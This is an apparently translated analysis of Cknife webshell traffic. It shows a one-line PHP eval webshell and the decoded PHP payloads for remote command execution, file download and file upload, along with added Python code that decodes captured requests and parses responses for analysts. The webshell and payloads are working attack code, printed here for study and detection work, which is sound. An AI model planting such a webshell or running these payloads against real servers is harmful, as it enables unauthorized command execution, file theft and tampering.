0x01 Environment
<?php eval($_REQUEST['shell']); ?>
0x02 Command execution
The run result is shown in the figure.
The POST data is shown below.
Decoded POST data:
#shell
@eval(base64_decode($_POST[action]));
#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$p=base64_decode($_POST["z1"]);
$s=base64_decode($_POST["z2"]);
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
$r="{$p} {$c}";
@system($r." 2>&1",$ret);
print ($ret!=0)?"ret={$ret}":"";;
echo("|<-");
die();
#z1
cmd
#z2
cd/d"C:\wamp64\www\"&whoami&echo [S]&cd&echo [E]
z2 is the whoami command line that Cknife assembled (it prepends cd /d "<web root>" and wraps the real command between echo [S] and echo [E] markers) and then base64-encoded. The shell parameter makes the webshell eval() the action code; that code base64-decodes z1 (the interpreter, here cmd) and z2 (the command line), chooses "-c" when the script directory starts with "/" (a Unix host) and "/c" otherwise (cmd.exe on Windows), joins the two into $r, runs $r through system() with stderr redirected into stdout (2>&1), prints ret=<code> if the exit status is non-zero, and prints the output.
The returned result is shown in the figure.
Cknife then formats the response: the text between the ->| and |<- markers is the output of the command.
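The request side of the exchange above, as an added example (this is not code from the original post or from Cknife): it decodes a captured command-execution POST the way the eval'd action stub does on the server and rebuilds the $r command line, including the "-c" versus "/c" choice. The POST body is constructed here from the article's own parameter values (the action stub, z1=cmd, z2=the whoami batch line), base64- and URL-encoded as Cknife would send them; the classify_action() helper and its keyword list are my own assumption for triage work, not something Cknife exposes.

```python
# Added example (not from the original post): decode a Cknife command POST
# the way the server-side "action" stub does, and rebuild $r.
import base64
from typing import Dict
from urllib.parse import parse_qs, urlencode

# The PHP the article shows as the decoded "action" parameter (one line on the wire).
ACTION_STUB = (
    r'@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);'
    r'echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);'
    r'$d=dirname($_SERVER["SCRIPT_FILENAME"]);'
    r'$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";'
    r'$r="{$p} {$c}";@system($r." 2>&1",$ret);'
    r'print ($ret!=0)?"ret={$ret}":"";;echo("|<-");die();'
)

# Constructed sample request: the parameter values from the article, encoded
# the way Cknife sends them (base64 for action/z1/z2, then form URL-encoding).
Z2_COMMAND = 'cd/d"C:\\wamp64\\www\\"&whoami&echo [S]&cd&echo [E]'
SAMPLE_POST = urlencode({
    "shell": "@eval(base64_decode($_POST[action]));",
    "action": base64.b64encode(ACTION_STUB.encode()).decode(),
    "z1": base64.b64encode(b"cmd").decode(),
    "z2": base64.b64encode(Z2_COMMAND.encode()).decode(),
})


def decode_request(body: str) -> Dict[str, str]:
    """Return the raw shell stub plus base64-decoded action/z1/z2 from a POST body."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    out = {"shell": params.get("shell", "")}
    for name in ("action", "z1", "z2"):
        if name in params:
            out[name] = base64.b64decode(params[name]).decode("utf-8", "replace")
    return out


def build_command(p: str, s: str, script_dir: str) -> str:
    """Mirror of $c and $r in the stub: "-c" when the script dir starts with "/"
    (Unix shell), "/c" otherwise (cmd.exe); the command is always double-quoted."""
    flag = "-c" if script_dir.startswith("/") else "/c"
    return f'{p} {flag} "{s}"'


def classify_action(action: str) -> str:
    """Assumed triage heuristic: which Cknife stage a decoded action stub is."""
    if "system(" in action or "shell_exec(" in action:
        return "command"
    if "readfile(" in action:
        return "download"
    if "fwrite(" in action:
        return "upload"
    return "unknown"


if __name__ == "__main__":
    req = decode_request(SAMPLE_POST)
    print("stage :", classify_action(req["action"]))
    print("z1    :", req["z1"])
    print("z2    :", req["z2"])
    print("$r    :", build_command(req["z1"], req["z2"], "C:\\wamp64\\www"))
```

The same decoder works on a body captured from a proxy or a packet capture; only the SCRIPT_FILENAME directory passed to build_command() has to be supplied by the analyst, since the stub derives it on the server.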
0x03 Download
The POST data is shown below.
Decoded POST data:
#shell
@eval(base64_decode($_POST[action]));
#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$F=get_magic_quotes_gpc()?base64_decode(stripslashes($_POST["z1"])):base64_decode($_POST["z1"]);
$fp=@fopen($F,"r");
if(@fgetc($fp)){
@fclose($fp);
@readfile($F);
}else
{
echo("ERROR:// Can Not Read");
};
echo("|<-");
die();
#z1
C:\wamp64\www\index.php
z1 is the base64-encoded path of the target file. Cknife executes the action code through eval(); that code base64-decodes the path (running stripslashes() first when magic_quotes_gpc is on), opens the file and checks with fgetc() that at least one character can be read. If it can, the whole file is output with readfile(); otherwise the stub prints ERROR:// Can Not Read. Cknife then writes the returned content to a local file.
The returned result is shown in the figure.
Note that if you save the whole response body to a file, you have to strip everything outside the ->| and |<- markers yourself and keep only the content between them, otherwise the saved file will be corrupted.
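The response side, as an added example that is not part of the original post: the stub echoes ->| before its output and |<- right before die(), so anything the hosting page printed before the eval() ran has to be discarded, a download has to be handled as raw bytes so a binary file is not corrupted, and for the command stage from 0x02 the trailing ret=<code> that the stub prints on a non-zero exit status has to be split off. The three sample response bodies are constructed here, not captured from Cknife.

```python
# Added example (not from the original post): recover the payload from a
# Cknife response body for the download and command stages.
import re
from typing import Optional, Tuple

MARK_START = b"->|"
MARK_END = b"|<-"


def extract_payload(raw: bytes) -> Optional[bytes]:
    """Bytes between the first "->|" and the last "|<-", or None if absent.
    rfind() is used for the end marker because "|<-" is the last thing the
    stub prints before die(), so it cannot be followed by page output."""
    start = raw.find(MARK_START)
    end = raw.rfind(MARK_END)
    if start == -1 or end == -1 or end < start:
        return None
    return raw[start + len(MARK_START):end]


def parse_download(raw: bytes) -> Tuple[bool, bytes]:
    """Download stage: (True, file_bytes) or (False, error_text)."""
    payload = extract_payload(raw)
    if payload is None:
        return False, b"no Cknife markers in response"
    if payload.startswith(b"ERROR://"):          # "ERROR:// Can Not Read"
        return False, payload
    return True, payload


_RET = re.compile(rb"ret=(\d+)$")


def parse_command(raw: bytes) -> Tuple[int, bytes]:
    """Command stage: (exit_status, output). The stub appends "ret=N" only
    when system() returned non-zero, so a missing suffix means status 0."""
    payload = extract_payload(raw)
    if payload is None:
        return -1, b""
    m = _RET.search(payload)
    if m:
        return int(m.group(1)), payload[:m.start()]
    return 0, payload


# Constructed sample responses (not captured from Cknife).
SAMPLE_DOWNLOAD = (b"<html><body>Hello from index.php\n"
                   b"->|<?php\r\necho 'index';\r\n|<-")
SAMPLE_COMMAND = b"->|desktop-1\\user\r\n[S]\r\nC:\\wamp64\\www\r\n[E]\r\n|<-"
SAMPLE_FAILED = (b"->|'nosuch' is not recognized as an internal or external "
                 b"command\r\nret=1|<-")

if __name__ == "__main__":
    ok, data = parse_download(SAMPLE_DOWNLOAD)
    print("download ok:", ok, "bytes:", len(data))
    status, out = parse_command(SAMPLE_FAILED)
    print("exit status:", status, "output:", out)
```

The ret= split is a heuristic: legitimate command output that happens to end in "ret=<digits>" would be mis-parsed, so treat the status as advisory rather than authoritative.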
0x04 File upload
The POST data is shown below.
Decoded POST data:
#shell
@eval(base64_decode($_POST[action]));
#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=$_POST["z2"];
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)
$buf.=urldecode("%".substr($c,$i,2));
echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;
echo("|<-");
die();
#z1
C:\wamp64\www\test.txt
#z2
this is a test
z1 is the base64-encoded target file path and z2 is the hex-encoded content of the local file. Cknife executes the action code through eval(); that code base64-decodes the target path, reads z2, strips any \r and \n, and in a for loop turns each pair of hex digits into a URL-encoded byte ("%XX") that urldecode() converts back and appends to $buf. When the loop ends $buf holds the file content, which is written to the target file; a successful write prints 1 and a failed write prints 0.
The returned result is shown in the figure.
If the content between ->| and |<- is 1, the file upload succeeded.